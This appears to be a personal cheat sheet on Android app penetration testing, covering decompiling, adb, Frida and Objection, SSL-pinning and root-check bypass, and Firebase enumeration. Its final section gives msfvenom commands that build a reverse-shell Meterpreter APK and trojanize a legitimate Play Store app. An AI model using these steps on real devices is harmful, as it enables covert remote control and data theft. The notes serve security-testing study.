Basic Info
- Android is based on Linux -> Linux commands works.
Manifest.xml -> it is a file that contains info about the version of the API used, the architecture (32 or 64) and more. It exists in all the application and it contains the permissions, activities, etc.
‘Permissions’ contains the permissions that are required for the app. ‘Permissions’ contains the permissions that are required for the app. Info-each-permission
‘Activities’ contains the page of the applications.
‘Content’ providers is used to share data from others apps.
Interesting Tools
Jadx
It is a decompiler to Java.
Command to install Java:
1
sudo apt-get install default-jdk
Command to install the tool:
1
sudo apt-get install jadx
Command to open the tool:
1
jadx-gui
adb
Shell on Android emulators - adb
Command to install the tool:
1
sudo apt-get install adb
Checks if it has been run as root:
1
adb root
To open a shell on the device:
1
adb shell
Android Studio
Android Studio - emulator
- To extract files on the device: View > Tool Windows > Device File Explorer.
- Open a terminal and can run adb shell and gain access to the phone: View > Tool Windows > Terminal.
- The terminal have a tab called “logcat” that may expose sensitive data stored in the log files.
1
adb shell
apktool
Reverse engineer APK - apktool
Command to install the tool:
1
sudo apt-get install apktool
MobSF
It is an automatic tool for static and dynamic analysis.
Android Static Analysis
Tool Android Studio
Android Studio is an Integrated Development Environment (IDE) specifically designed for Android app development. It serves as the primary tool for Android developers to create, test, and deploy applications for Android devices. Android Studio provides a comprehensive set of features, including code editing, debugging, testing, and performance analysis, all within a user-friendly interface. It also includes the Android Emulator, which allows developers to simulate various Android devices for app testing. Android Studio is the official IDE supported by Google for Android app development and is widely used in the Android development community.
Open Android Studio and write “adb shell” in the terminal.
Downloading an APK:
- Copy the path of the application.
- Write “exist” in the shell.
- In the terminal, create a directory and go there.
- Download the APK from the phone and save it on the atacker machine:
1
adb pull <path> <nameAPK>
Open the tool Jadx and import the APK to analyze its souce code.
Other option is to decompile the APK with apktool:
1
apktool d <app.apk>
You can use the command ‘strings’ to watch the strings of a file:
1
strings <file>
Tool Jadx
Its is a decompiler to Java.
In the directory smali in where all the source code is stored, but it isn´t so human writable. So, we can use dex2jar to read it better.
If an activity have the parameter export = true, you can access by adb
1
2
3
adb shell
am start <activity>
Commands:
List the applications installed on the phone:
1
pm list packages
Looking for an application:
1
pm list packages | grep <nameApp>
Looking for the path of the application:
1
pm path <package>
Android Dynamic Analysis
To intercept HTTPS trafic (with Burp, for example)-> SSL pinning or Frida.
Interesting tools
- MobSF
Its a tool for see logs, SSL pinning, Frida scripts, generate report and more.
It has an option that offers ‘HTTP Tools,’ where we can monitor all the requests and responses of the APP. It also has a fuzzer, which allows it to send data to Burpsuite.
If you want to use Burpsuite to intercept the requests from the mobile device with the emulator, you may encounter an error related to the Burp certificate, and you’ll have to add it to the phone. Export the certificate from Burp and import it into the phone.
- Objection
Objection is an SSL bypass tool that automatically injects Frida into an app. If the automatic injection doesn’t work, you might need to perform a manual injection on the device. Objection simplifies the process of decompiling the APK, but there are cases where it may not work as expected.
Steps to install Objection:
1
2
3
pip3 install frida-tools
pip3 install objection
If the APP is an APK, you can use this command:
1
objection <path-apk> --source <nameAPK>
It generates a new APK pathed with Frida.
Sometimes it doesn’t generate the certificates correctly and doesn’t work properly. This is to inject Frida automatically into the APK. If it doesn’t work you can do it manually.
If it worked, you can control the APK with the command:
1
objection explore
You can disable SSL pinning to intercept trafic HTTPS in clear text:
1
android sslpinning disable
Dump the memory:
1
memory dump all
To bypass root permission:
1
android root disable
There are a lot of scripts in Frida: https://codeshare.frida.re/
You can save one and you can use it with the command:
1
objection explore --startup-script <path>
- Inject Frida Manually
First, decompile the source code:
1
apkool d -r <target.apk>
Download frida-gadget for your CPU Architecture. Unzip File, and rename file to frida-gadget.so.
Inject Frida-gadget into Android APP under: /lib/<’CPUArch-For-Your-Device’>
Save As: libfrida-gadget.so
Add reference to frida-gadget to SMALI code, in a known exported activity or otherwise accessible Activity (usually MainActivity.smali, or OnboardingActivity.smali): const-string v0, “frida-gadget” invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)
Recompile the application:
1
apktool b <target.apk> -o <output_file.apk>
Update APK with your own keys and zipalign.
Sign with your key, and zipalign the APP:
https://koz.io/using-frida-on-android-without-root/
For it to work, the APK must have the internet permission enabled. If not, you have to add it.
Now, upload the APK with Frida installed and install it on the phone.
Tools to Open SQLite file
Pentest Physical Device
Steps:
Install adb.
Open Android Studio.
Enable the developer options on the phone.
Enable USB debugguing in the developers settings - permit to connect to the phone with adb.
In the terminal of the Android Studio write “adb shell”.
Enable the option called “stay awake” in the settings of the emulator to prevent the terminal from locking while it is being analyzed.
See the other options because it can be interesting. For example, debugging an app, etc.
You can add a proxy to intercept the queries in Burpsuite.
Cloud enumeration
Tool - Cloud Enum
Syntax:
1
python3 cloud_enum.py -k <name.apk>
Enumerating Firebase Database
Tool Firebase-enum
Syntax:
1
python3 firebaseEnum.py -k <nameAPK>
Create a Malicious APK
Tool - msfvenom
Syntax:
1
msfvenom -p android/meterpreter/reverse_tcp LHOST=<kali_IP> LPORT=<your_port> R> -o <myapp.apk>
This will make an APP with a generic looking icon named “Main Activity”.
Install it to your target phone:
1
adb install <myapp.apk>
You must to open Metasploit with a multi/handler. It opens a Meterpreter connection.
Inject a Meterpreter payload into a legitimate APK
https://ibotpeaches.github.io/Apktool/install/
Steps to inject an APP from the play store:
Download an APP to your Android device.
Pull it using adb. And write this commands:
1
pm list packages | grep <app_name>
1
pm path <app_package_name>
1
exit adb shell
1
adb pull <path_to_apk/base.apk> -o <my_app.apk>
- After you have the APK, use the following msfvenom command to inject it automatically:
1
msfvenom -x <my_app.apk> -p android/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<my_port> -o <my_app_hacked.apk>
- Uninstall the app from the target device, and install the hacked version using:
1
adb install <my_app_hacked.apk>
Interesting Article: https://www.blackhillsinfosec.com/embedding-meterpreter-in-android-apk/
You must have usb debugging enabled (developer options) and be on the same network.